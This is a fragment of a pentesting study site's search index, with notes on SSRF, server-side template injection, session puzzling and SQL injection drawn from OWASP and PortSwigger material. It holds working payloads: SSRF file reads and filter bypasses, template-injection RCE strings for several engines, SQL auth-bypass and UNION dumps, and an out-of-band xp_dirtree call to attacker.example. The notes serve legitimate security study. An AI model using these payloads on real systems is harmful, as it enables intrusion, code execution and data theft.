                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/","title":"SSRF attack - Server Side Request Forgery","text":"OWASP

                                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.19. Testing for Server-Side Request Forgery

ID Link to Hackinglife Link to OWASP Description 7.19 WSTG-INPV-19 Testing for Server-Side Request Forgery - Identify SSRF injection points. - Test if the injection points are exploitable. - Assess the severity of the vulnerability.

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location. The attacker can make the server issue requests to the internet or to the intranet, which can be used to port-scan or probe internal machines. Basically, it could allow an attacker to:

                                            • Take control of a remote machine.
                                            • Read or update data.
                                            • Read the server configuration.
                                            • Connect to internal services...

                                            With:

                                            http://\nfile:///\ndict://\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#exploitation","title":"Exploitation","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#load-the-contents-of-a-file","title":"Load the Contents of a File","text":"
                                            GET https://example.com/page?page=https://malicioussite.com/shell.php\n

                                            See Burpsuite Labs

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#read-files-from-restricted-resources","title":"Read files from restricted resources","text":"
                                            GET https://example.com/page?page=https://localhost:8080/admin\nGET https://example.com/page?page=https://127.0.0.1:8080/admin\nGET https://example.com/page?page=file:///etc/passwd\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#read-files-from-other-backend-systems","title":"Read files from other backend systems","text":"

                                            In some cases, the application server is able to interact with back-end systems that are not directly reachable by users. These systems often have non-routable private IP addresses.

                                            GET https://example.com/page?page=https://localhost:3306/\nGET https://example.com/page?page=https://localhost:6379/\nGET https://example.com/page?page=https://localhost:8080/\n
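
Differences in status code, response length, or timing reveal which back-end ports are open. A sketch of scripting this through the vulnerable parameter (URL and parameter taken from the examples above):

import requests\n\nbase = 'https://example.com/page'\nfor port in (3306, 6379, 8080):\n    r = requests.get(base, params={'page': f'https://localhost:{port}/'})\n    print(port, r.status_code, len(r.content))\n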

Gopherus can craft payloads that send unauthenticated requests to these internal services.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#techniques","title":"Techniques","text":"

                                            Bypass blacklist-based input filters

                                            Some applications block input containing hostnames like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can often circumvent the filter using the following techniques:

• Use an alternative IP representation of 127.0.0.1, such as 2130706433, 017700000001, or 127.1 (see the sketch after this list).
                                            • Register your own domain name that resolves to\u00a0127.0.0.1. You can use\u00a0spoofed.burpcollaborator.net\u00a0for this purpose.
                                            • Obfuscate blocked strings using URL encoding or case variation.
                                            • Provide a URL that you control, which redirects to the target URL. Try using different redirect codes, as well as different protocols for the target URL. For example, switching from an\u00a0http:\u00a0to\u00a0https:\u00a0URL during the redirect has been shown to bypass some anti-SSRF filters.
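
A small helper for generating the alternative representations of 127.0.0.1 mentioned in the first bullet above:

import ipaddress\n\nn = int(ipaddress.IPv4Address('127.0.0.1'))\nprint(n)        # 2130706433 (decimal form)\nprint(oct(n))   # 0o17700000001, often written 017700000001\nprint(hex(n))   # 0x7f000001\nprint('127.1')  # short form: omitted middle octets are treated as zero\n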

                                            Bypass whitelist-based input filters

Some applications only allow inputs that match a whitelist of permitted values. The filter may look for a match at the beginning of the input, or contained within it. You may be able to bypass this filter by exploiting inconsistencies in URL parsing.

• Using the @ character to separate the userinfo from the host: https://expected-host:fakepassword@evil-host
                                            • URL fragmentation with the\u00a0#\u00a0character:\u00a0https://attacker-domain#expected-domain
• You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example: https://expected-host.evil-host
                                            • URL encoding. Double URL-encode characters to confuse the URL-parsing code.
                                            • Fuzzing
                                            • Combinations of all of the above
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#exploiting-redirection-vulnerabilities","title":"Exploiting redirection vulnerabilities","text":"

                                            It is sometimes possible to bypass filter-based defenses by exploiting an open redirection vulnerability.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#resources","title":"Resources","text":"
                                            • Portswigger: https://portswigger.net/web-security/ssrf.
                                            • Portswigger labs.
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-request-forgery-ssrf/#tools-and-payloads","title":"Tools and payloads","text":"
                                            • See updated chart: Attacks and tools for web pentesting.
                                            • Gopherus.
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/","title":"Server-side Template Injection (SSTI)","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#what-is-ssti","title":"What is SSTI?","text":"

                                            Web applications frequently use template systems to embed dynamic content in web pages and emails.

For instance: ASP frameworks (Razor), PHP frameworks (Twig, Symfony, Smarty, Laravel, Slim, Plates), Python frameworks (Django, Mako, Jinja2), Java frameworks (Groovy, FreeMarker, Jinjava, Pebble, Thymeleaf, Velocity, Spring, patTemplate, Expression Language EL), JavaScript frameworks (Handlebars, Codepen, Lessjs, Lodash), Ruby frameworks (ERB, Slim).

                                            Server-side Template Injection vulnerabilities (SSTI) occur when user input is trusted when embedding a template, which is an unsafe implementation and might lead to remote code execution on the server.

                                            OWASP

                                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.18. Testing for Server-side Template Injection

                                            ID Link to Hackinglife Link to OWASP Description 7.18 WSTG-INPV-18 Testing for Server-side Template Injection - Detect template injection vulnerability points. - Identify the templating engine. - Build the exploit. Resources for these notes
                                            • Portswigger: Server-Side Template Injection
                                            • Hacktricks: SSTI payloads
                                            Payloads
                                            • PayloadsAllTheThings for SSTI

Snippet of vulnerable source code:

                                            custom_email={{self}}\n

What we have here is essentially server-side code execution inside a sandbox. Depending on the template engine used, it may be possible to execute arbitrary code directly or even to escape the sandbox and execute it. Following the example, in a POST request the expected email value can be replaced by a payload, which then gets executed.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#exploitation","title":"Exploitation","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#1-detect-injection-points","title":"1. Detect injection points","text":"

                                            Template languages use syntax chosen explicitly not to clash with characters used in normal HTML, so it's easy for a manual blackbox security assessment to miss template injection entirely.\u00a0To detect it, we need to invoke the template engine by embedding a statement.

                                            Here\u2019s a simple example of using Twig in a PHP application. This would be the exampletemplate.twig:

                                            <!DOCTYPE html>  \n<html>  \n<head>  \n    <title>{{ title }}</title>  \n</head>  \n<body>  \n    <h1>Hello, {{ name }}!</h1>  \n</body>  \n</html>\n

                                            And the PHP rendering the Twig template:

                                            <?php  \nrequire_once 'example/page.php';  \n\n$loader = new \\Twig\\Loader\\FilesystemLoader(__DIR__);  \n$twig = new \\Twig\\Environment($loader);  \n\n$template = $twig->load('exampletemplate.twig');  \necho $template->render(['title' => 'Twig Example', 'name' => 'John']);  \n?>\n

                                            Now, coming back to our web app, we could curl the following:

                                            $ curl -g 'http://www.target.com/page?name={{7*7}}'\n

                                            With SSTI the response would be:

                                            Hello 49!\n
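
Detection like this can be automated by sending a few arithmetic probes and checking whether they come back evaluated; a hedged sketch reusing the URL and parameter from the curl example:

import requests\n\nurl = 'http://www.target.com/page'\nprobes = {'{{7*7}}': '49', '${7*7}': '49', '<%= 7*7 %>': '49'}\n\nfor payload, expected in probes.items():\n    r = requests.get(url, params={'name': payload})\n    if expected in r.text and payload not in r.text:\n        print(f'payload {payload!r} was evaluated by a template engine')\n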

Trick: there are a huge number of template languages, but many of them share basic syntax characteristics. We can take advantage of this by sending generic, template-agnostic payloads using basic operations to detect multiple template engines with a single HTTP request. This polyglot payload will trigger an error in the presence of an SSTI vulnerability:

                                            ${{<%[%'\"}}%\\.\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#2-identify-the-template-engine","title":"2. Identify the template engine","text":"

                                            After detecting template injection, the next step is to identify the template engine in use.

Probe payloads can be followed like a decision tree, branching on 'success' and 'failure' responses. In some cases, a single payload can have multiple distinct success responses - for example, the probe {{7*'7'}} would result in 49 in Twig, 7777777 in Jinja2, and neither if no template language is in use.

                                            Payloads for different Template engines
                                            • PayloadsAllTheThings for SSTI
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#3-exploitation","title":"3. Exploitation","text":"

                                            Once you discover a server-side template injection vulnerability, and identify the template engine being used, successful exploitation typically involves the following process.

                                            • Read

                                              • Template syntax
                                              • Security documentation
                                              • Documented exploits
                                            • Explore the environment:

                                            Many template engines expose a \"self\" or \"environment\" object of some kind, which acts like a namespace containing all objects, methods, and attributes that are supported by the template engine. If such an object exists, you can potentially use it to generate a list of objects that are in scope.

It is important to note that websites will contain both built-in objects provided by the template and custom, site-specific objects that have been supplied by the web developer. You should pay particular attention to these non-standard objects.

                                            • Create a custom attack
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#1-java-frameworks","title":"1. Java frameworks","text":"

                                            Many template engines expose a \"self\" or \"environment\" object. In Java-based templating languages, you can sometimes list all variables in the environment using the following injection:

                                            ${T(java.lang.System).getenv()}\n

                                            This can form the basis for creating a shortlist of potentially interesting objects and methods to investigate further. Additionally, for Burp Suite Professional users, the Intruder provides a built-in wordlist for brute-forcing variable names.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#11-freemarker","title":"1.1. FreeMarker","text":"

                                            Basic payloads:

                                            {{7*7}}\n# return {{7*7}}\n\n${7*7}\n#return 49\n\n#{7*7}\n#return 49 -- (legacy)\n\n${7*'7'}\n#return nothing\n

                                            RCE in FreeMarker:

                                            <#assign ex = \"freemarker.template.utility.Execute\"?new()>${ ex(\"id\")}\n[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}\n${\"freemarker.template.utility.Execute\"?new()(\"id\")}\n\n${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(\" \")}\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#12-velocity","title":"1.2. Velocity","text":"

                                            RCE in Velocity:

                                            $class.inspect(\"java.lang.Runtime\").type.getRuntime().exec(\"sleep 5\").waitFor()   \n\n[5 second time delay]   \n0\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#2-php-frameworks","title":"2. PHP frameworks","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#21-smarty","title":"2.1. Smarty","text":"

                                            RCE in Smarty

                                            {php}echo `id`;{/php}\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#3-python-frameworks","title":"3. Python frameworks","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#31-mako","title":"3.1. Mako","text":"

                                            RCE in Mako

                                            <%   import os   x=os.popen('id').read()   %>   ${x}\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#32-tornado","title":"3.2. Tornado","text":"

                                            Basic payloads:

                                            {{7*7}}\n# return 49\n\n${7*7}\n# return ${7*7}\n\n{{foobar}}\n#return Error\n\n{{7*'7'}}\n# return 7777777\n

                                            RCE in Tornado:

                                            {{os.system('whoami')}}\n\n\n{% import os %}{{ os.popen(\"whoami\").read() }}\n

                                            Useful tips to create SSTI exploit for Tornado:

• Anything coming between {{ and }} is evaluated and sent back to the output.

                                            {{ 2*2 }}\u00a0-> 4

                                            • {% import module %} - Allows you to import python modules.

                                            {% import subprocess %}

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#4-ruby-frameworks","title":"4. Ruby frameworks","text":"","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#41-erb","title":"4.1. ERB","text":"

                                            Basic injection:

                                            <%= 7 * 7 %>\n

                                            Retrieve /etc/passwd

                                            <%= File.open('/etc/passwd').read %>\n

                                            List files and directories

                                            <%= Dir.entries('/') %>\n\n\n<%= File.open('/example/arbitrary-file').read %>\n

                                            Code execution

                                            <%= system('cat /etc/passwd') %>\n<%= `ls /` %>\n<%= IO.popen('ls /').readlines()  %>\n<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>\n<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>\n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#tools","title":"Tools","text":"
                                            • Tplmap
                                            • Backslash Powered Scanner Burp Suite extension
                                            • Template expression test strings/payloads list
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/server-side-template-injection-ssti/#related-lab","title":"Related lab","text":"

                                            HackTheBox: Nunchunks: Express server with a nunjucks template engine.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/session-puzzling-or-session-variable-overloading/","title":"Session Puzzling - Session Variable Overloading","text":"

OWASP vulnerability description: https://owasp.org/www-community/vulnerabilities/Session_Variable_Overloading.

Session Variable Overloading (also known as Session Puzzling, or Temporal Session Race Conditions) is an application-level vulnerability which can enable an attacker to perform a variety of malicious actions. This vulnerability occurs when an application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers, so that the session variable is set in one context and then used in another.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/session-puzzling-or-session-variable-overloading/#demo","title":"Demo","text":"

A demo (from 2011!):

https://www.youtube.com/embed/-DackF8HsIE
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/session-puzzling-or-session-variable-overloading/#tools-and-payloads","title":"Tools and payloads","text":"
                                            • See updated chart: Attacks and tools for web pentesting.
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/","title":"SQL injection","text":"

SQL stands for Structured Query Language. SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database: viewing, retrieving, modifying, or deleting data, or even compromising the infrastructure with, for instance, a denial-of-service attack.

                                            A detailed SQLi Cheat sheet for manual attack.

                                            OWASP

                                            OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.5. Testing for SQL Injection

                                            ID Link to Hackinglife Link to OWASP Description 7.5 WSTG-INPV-05 Testing for SQL Injection - Identify SQL injection points. - Assess the severity of the injection and the level of access that can be achieved through it. Sources for these notes
                                            • My Ine: eWPTv2.
                                            • Hacktricks.
                                            • OWASP: WSTG Testing for SQL injection.
                                            • Notes during the Cibersecurity Bootcamp at The Bridge.
                                            • Experience pentesting applications.
                                            Languages and dictionaries Server Dictionary MySQL MySQL payloads. MSSQL MSSQL payloads. PostgreSQL PostgreSQL payloads. Oracle Oracle SQL payloads. SQLite SQLite payloads. Cassandra Cassandra payloads. Attack-based dictionaries
                                            • Generic SQL Injection Payloads
                                            • Generic Error Based Payloads.
                                            • Generic Union Select Payloads.
                                            • SQL time based payloads .
                                            • SQL Injection Auth Bypass Payloads
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#how-does-sql-injection-work","title":"How does SQL injection work?","text":"

                                            1. Retrieving hidden data

Examples from a shopping application:

• Request: http://insecure-website.com/products?category=Gifts. Query: SELECT * FROM products WHERE category='Gifts' AND released=1. Explained: the restriction \"released\" is being used to hide products that are not released (unreleased products presumably have released=0).
• Request: http://insecure-website.com/products?category=Gifts'--. Query: SELECT * FROM products WHERE category='Gifts'--' AND released=1. Explained: the double-dash sequence -- is a comment indicator in SQL, which means that the rest of the query is interpreted as a comment. The application will display all the products in the category, released or not.
• Request: https://insecure-website.com/products?category=Gifts'+OR+1=1--. Query: SELECT * FROM products WHERE category='Gifts' OR 1=1--' AND released=1. Explained: this returns all items where category is Gifts, or 1=1. Since 1=1 is always true, the query will return all items.

                                            2. Subverting application logic

| Request URL | SQL Query | Explained |
| --- | --- | --- |
| Login | SELECT * FROM users WHERE username=\"admin\" AND password=\"lalalala\" | Login process, probably with a POST method. |
| Login: entering admin'-- in the username field and '' in the password field | SELECT * FROM users WHERE username=\"admin'-- AND password='' | This query returns the user whose name is admin and successfully logs the attacker in as that user. |","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#clasification","title":"Classification","text":"

SQLi (SQL injection) typically falls into three categories.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#1-in-band-sqli-or-classic-sql-injection","title":"1. In-band SQLi / or Classic SQL injection","text":"

In-band SQL injection is the most common type of SQL injection attack. It occurs when an attacker uses the same communication channel to send the attack and receive the results. In other words, the attacker injects malicious SQL code into the web application and receives the results of the attack through the same channel used to submit the code. In-band SQL injection attacks are dangerous because they can be used to steal sensitive information, modify or delete data, or take over the entire web application or even the entire server.

                                            In-band SQL injection can be further divided into two subtypes/exploitation techniques:

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#11-error-based-sqli","title":"1.1. Error-based SQLi","text":"

In error-based SQL injection, the attacker injects SQL code that causes the web application to generate an error message. The error message can contain valuable information about the database schema or the contents of the database itself, which the attacker can use to further exploit the vulnerability.

                                            The attacker performs actions that cause the database to produce error messages. The attacker can potentially use the data provided by these error messages to gather information about the structure of the database.
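For example, on MySQL the extractvalue() function can be abused to smuggle query results into the error text. A minimal sketch, assuming a MySQL backend and an injectable string parameter (the value leaked here is the server version):

' AND extractvalue(1, concat(0x7e, (SELECT @@version)))-- -\n

The resulting XPath syntax error message echoes everything after the ~ marker, so the application's error page leaks the selected data.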

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#12-union-based-sqli","title":"1.2. Union-based SQLi","text":"

                                            The UNION operator is used in SQL to combine the results of two or more SELECT statements into a single result set. Therefore, it requires that the number of columns and their data types match in the SELECT statements being combined.

In union-based SQL injection, the attacker injects additional SELECT statements through the vulnerable input. By manipulating the injected SQL code, the attacker can extract data from the database that they are not authorized to access.

                                            Here's an example to illustrate the concept. Consider the following vulnerable code snippet:

                                            SELECT id, name FROM users WHERE id = '<user_input>'\n

                                            An attacker can exploit this vulnerability by injecting a UNION-based attack payload into the parameter. They could inject a statement like:

                                            ' UNION SELECT credit_card_number, 'hack' FROM credit_cards --\n

                                            The injected payload modifies the original query to retrieve the credit card numbers along with a custom value ('hack') from the credit_cards table. The double dash at the end is used to comment out the remaining part of the original query.
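Before such a payload works, the attacker typically has to discover how many columns the original query returns. A common sketch against the same hypothetical parameter:

# Increase the number until the database errors out: the last working value is the column count\n' ORDER BY 1--\n' ORDER BY 2--\n' ORDER BY 3--\n\n# Alternatively, add NULLs until the UNION no longer errors\n' UNION SELECT NULL--\n' UNION SELECT NULL,NULL--\n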

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#2-inferential-blind-sqli","title":"2. Inferential (Blind) SQLi","text":"

                                            Blind SQL Injection is a type of SQL Injection attack where an attacker can exploit a vulnerability in a web application that does not directly reveal information about the database or the results of the injected SQL query. In this type of attack, the attacker injects malicious SQL code into the application's input field, but the application does not return any useful information or error messages to the attacker in the response. The attacker typically uses various techniques to infer information about the database, such as time delays or Boolean logic. The attacker may inject SQL code that causes the application to delay for a specified amount of time, depending on the result of a query.

                                            Blind SQL injection can be further divided into two subtypes/exploitation techniques:

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#21-boolean-based-content-based-blind-sqli","title":"2.1. Boolean-based (content-based) Blind SQLi","text":"

                                            Boolean-based SQL Injection: In this type of attack, the attacker exploits the application's response to boolean conditions to infer information about the database. The attacker sends a malicious SQL query to the application and evaluates the response based on whether the query executed successfully or failed.

This is an inferential SQL injection technique that relies on sending a SQL query to the database which forces the application to return a different result depending on whether the query evaluates to TRUE or FALSE.

                                            See this example:

                                            ' OR LENGTH(database()) > 5--\n

This payload tests whether the length of the database name is greater than 5 characters. Afterwards, you can test each character position one by one and thereby retrieve the name of the database.
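Character-by-character extraction then follows the same TRUE/FALSE oracle. A minimal MySQL-flavoured sketch (the position and candidate character are iterated, usually by a tool):

# TRUE if the first character of the database name is 'a'\n' OR SUBSTRING(database(),1,1)='a'--\n# TRUE if the second character is 'b', and so on\n' OR SUBSTRING(database(),2,1)='b'--\n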

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#22-time-based-blind-sqli","title":"2.2. Time-Based Blind SQLi","text":"

                                            Time-based Blind Injection: In this type of attack, the attacker exploits the application's response time to infer information about the database. The attacker sends a malicious SQL query to the application and measures the time it takes for the application to respond.

If you don't get a TRUE or FALSE response, you may sometimes infer whether the result is TRUE or FALSE from the response time. Time-based SQL injection is an inferential SQL injection technique that relies on sending a SQL query which forces the database to wait for a specified amount of time (in seconds) before responding. The response time indicates to the attacker whether the result of the query is TRUE or FALSE.
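Typical delay primitives differ per DBMS. A few hedged probe examples (the 5-second delay is arbitrary, and the stacked-query variants only work where the driver allows multiple statements):

# MySQL\n' OR SLEEP(5)--\n\n# PostgreSQL (stacked query)\n'; SELECT pg_sleep(5)--\n\n# Microsoft SQL Server (stacked query)\n'; WAITFOR DELAY '0:0:5'--\n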

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#3-out-of-band-sqli","title":"3. Out-of-Band SQLi","text":"

                                            Out-of-band SQL Injection is the least common type of SQL injection attack. It involves an attacker exploiting a vulnerability in a web application to extract data from a database using a different channel, other than the web application itself. Unlike in-band SQL Injection, where the attacker can observe the result of the injected SQL query in the application's response, out-of-band SQL Injection does not require the attacker to receive any response from the application. The attacker can use various techniques to extract data from the database, such as sending HTTP requests to an external server controlled by the attacker or using DNS queries to extract data.

It is used when an attacker is unable to use the same channel to launch the attack and gather the results. Out-of-band SQLi techniques rely on the database server's ability to make DNS or HTTP requests to deliver data to an attacker.

Such is the case with Microsoft SQL Server's xp_dirtree command, which can be used to make DNS requests to a server that an attacker controls, and Oracle Database's UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server that an attacker controls.
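As a sketch of the xp_dirtree technique just mentioned (attacker.example is a placeholder domain, and stacked queries must be permitted):

'; EXEC master..xp_dirtree '\\\\attacker.example\\share'--\n

The resulting DNS lookup for attacker.example shows up in the attacker's resolver logs, confirming execution even though the application itself returns nothing.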

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#databases","title":"Databases","text":"

                                            In computing, a database is typically managed by a Database Management System (DBMS) that provides a set of tools and interfaces to interact with the data. DBMS stands for \"Database Management System\". It is a software system that enables users to create, store, organize, manage, and retrieve data from a database.

                                            DBMS provides an interface between the user and the database, allowing users to interact with the database without having to understand the underlying technical details of data storage, retrieval, and management. DBMS provides various functionalities such as creating, deleting, modifying, and querying the data stored in the database. It also manages security, concurrency control, backup, recovery, and other important aspects of data management.

                                            Types of databases:

                                            • Relational Databases - A database that organizes data into one or more tables or relations, where each table represents an entity or a concept, and the columns of the table represent the attributes of that entity or concept. SQL databases are relational databases that store data in tables with rows and columns, and use SQL (Structured Query Language) as their standard language for managing data. They enforce strict data integrity rules and support transactions to ensure data consistency. SQL databases are widely used in applications that require complex data queries and the ability to handle large amounts of structured data. Some examples of SQL databases include MySQL, Oracle, Microsoft SQL Server, and PostgreSQL.
                                            • NoSQL Databases - A type of database that does not use the traditional tabular relations used in relational databases. Instead, NoSQL databases use a variety of data models to store and access data.
                                            • Object-oriented Databases - A database that stores data as objects rather than in tables, allowing for more complex data structures and relationships.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#1-rdbms-relational-database-management-system","title":"1. RDBMS - Relational Database Management System","text":"

RDBMS stands for Relational Database Management System. It is a software system that enables the creation, management, and administration of relational databases. RDBMSs are designed to store, organize, and retrieve large amounts of structured data efficiently. RDBMSs provide a set of features and functionalities that allow users to create database schemas, define relationships between tables, insert, update, and retrieve data, and perform complex queries using SQL. They also handle aspects like data security, transaction management, and concurrency control to ensure data integrity and consistency.

                                            The following are examples of popular DBMS (Database Management Systems):

                                            • MySQL - A free, open-source relational database management system that is widely used for web applications.
                                            • PostgreSQL - Another popular open-source relational database management system that is known for its advanced features and reliability.
                                            • Oracle Database - A commercial relational database management system developed by Oracle Corporation that is widely used in enterprise applications.
• Microsoft SQL Server - A commercial relational database management system developed by Microsoft.

                                            How relational databases work:

                                            • Tables: The basic building blocks of a relational database are tables, also known as relations. A table consists of rows (also called records or tuples) and columns (also known as attributes). Each row represents a unique record or instance of an entity, and each column represents a specific attribute or characteristic of that entity.

                                            • Keys: Keys are used to uniquely identify records within a table and establish relationships between tables. The primary key is a column or set of columns that uniquely identifies each row in a table. It ensures the integrity and uniqueness of the data. Foreign keys are columns in one table that reference the primary key of another table, establishing relationships between the tables.

                                            • Relationships: Relationships define how tables are connected or associated with each other. Common types of relationships include one-to-one, one-to-many, and many-to-many. These relationships are established using primary and foreign keys, allowing data to be linked and retrieved across multiple tables.

                                            • Structured Query Language (SQL): Relational databases are typically accessed and manipulated using the Structured Query Language (SQL). SQL provides a standardized language for querying, inserting, updating, and deleting data from relational databases. It allows users to perform operations such as retrieving specific records, filtering data based on conditions, joining tables to combine data, and aggregating data using functions.
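A minimal sketch tying these concepts together (the customers and orders tables are hypothetical):

CREATE TABLE customers (\n    id INT PRIMARY KEY,\n    name VARCHAR(100)\n);\n\nCREATE TABLE orders (\n    id INT PRIMARY KEY,\n    customer_id INT,\n    total DECIMAL(10,2),\n    FOREIGN KEY (customer_id) REFERENCES customers(id)  -- one-to-many relationship\n);\n\n-- Join the two tables through the primary/foreign key relationship\nSELECT c.name, o.total\nFROM customers c\nJOIN orders o ON o.customer_id = c.id;\n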

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#2-nosql","title":"2. NoSQL","text":"

NoSQL (Not Only SQL) databases are a type of database management system that differs from traditional relational databases (RDBMS) in terms of data model, scalability, and flexibility. NoSQL databases are designed to handle large volumes of unstructured, semi-structured, and rapidly changing data. NoSQL databases are commonly used in modern web applications, big data analytics, real-time streaming, content management systems, and other scenarios where the flexibility, scalability, and performance advantages they offer are valuable.

                                            There are several popular NoSQL databases available, each with its own strengths and use cases. Here are some examples of well-known NoSQL databases:

                                            • MongoDB: MongoDB is a document database that stores data in flexible, JSON-like documents. It provides scalability, high performance, and rich query capabilities. MongoDB is widely used in web applications, content management systems, and real-time analytics. It uses MQL (MongoDB Query Language).
                                            • Redis: Redis is an in-memory data store that supports various data structures, including strings, hashes, lists, sets, and sorted sets. It is known for its exceptional performance and low latency. Redis is often used for caching, real-time analytics, session management, and pub/sub messaging.
                                            • Amazon DynamoDB.
                                            • CouchBase Server.
• Apache Cassandra: A distributed columnar database designed to handle large amounts of data across multiple commodity servers. It offers high availability, fault tolerance, and linear scalability.
                                            • Apache HBase.
                                            • Riak.
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#how-web-applications-utilize-sql-queries","title":"How web applications utilize SQL queries","text":"

                                            The following code contains a PHP example of a connection to a MySQL database and the execution of a SQL query.

                                            $dbhostname='1.2.3.4';\n$dbuser='username';\n$dbpassword='password';\n$dbname='database';\n\n$connection = mysqli_connect($dbhostname, $dbuser, $dbpassword, $dbname);\n$query = \"SELECT Name, Description FROM Products WHERE ID='3' UNION SELECT Username, Password FROM Accounts;\";\n\n$results = mysqli_query($connection, $query);\ndisplay_results($results);\n

Most of the time, queries are not static; they are built dynamically from user input. Here is a vulnerable dynamic query example:

                                            $id = $_GET['id'];\n\n$connection = mysqli_connect($dbhostname, $dbuser, $dbpassword, $dbname);\n$query = \"SELECT Name, Description FROM Products WHERE ID='$id';\";\n\n$results = mysqli_query($connection, $query);\ndisplay_results($results);\n

                                            If an attacker crafts an $id value which can actually change the query, like:

                                            ' OR 'a'='a\n

                                            Then the query becomes:

                                            SELECT Name, Description FROM Products WHERE ID='' OR 'a'='a';\n

                                            This tells the database to select the items by checking two conditions:

• The id must be empty (id='') OR an always-true condition ('a'='a')
• Since the first condition is not met, the SQL engine evaluates the second condition of the OR, which is crafted to always be true.

                                            In other words, this tells the database to select all the items in the Products table.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/sql-injection/#common-injectable-fields","title":"Common injectable fields","text":"

                                            SQL injection vulnerabilities can exist in various input fields within an application.

                                            • Login forms: The username and password fields in a login form are common targets for SQL injection attacks.
                                            • Search boxes: Input fields used for searching within an application are potential targets for SQL injection. If the search query is directly incorporated into a SQL statement without proper validation, an attacker can inject malicious SQL code to manipulate the query and potentially access unauthorized data.
                                            • URL parameters: Web applications often use URL parameters to pass data between pages. If the application uses these parameters directly in constructing SQL queries without proper validation and sanitization, it can be susceptible to SQL injection attacks.
                                            • Form fields: Any input fields in forms, such as registration forms, contact forms, or comment fields, can be vulnerable to SQL injection if the input is not properly validated and sanitized before being used in SQL queries.
                                            • Hidden fields: Hidden fields in HTML forms can also be susceptible to SQL injection attacks if the data from these fields is directly incorporated into SQL queries without proper validation.
                                            • Cookies: In some cases, cookies containing user data or session information may be used in SQL queries. If the application does not validate or sanitize the cookie data properly, it can lead to SQL injection vulnerabilities.
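Whichever of these inputs ends up in a query, a quick first triage is to send a handful of probe payloads and watch for errors or behavioral differences. A minimal, backend-agnostic sketch:

# A lone quote often breaks the query syntax and surfaces an error\n'\n# A balanced pair should behave like benign input\n''\n# Always-true vs. always-false conditions that change the response suggest injection\n' OR '1'='1\n' AND '1'='2\n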
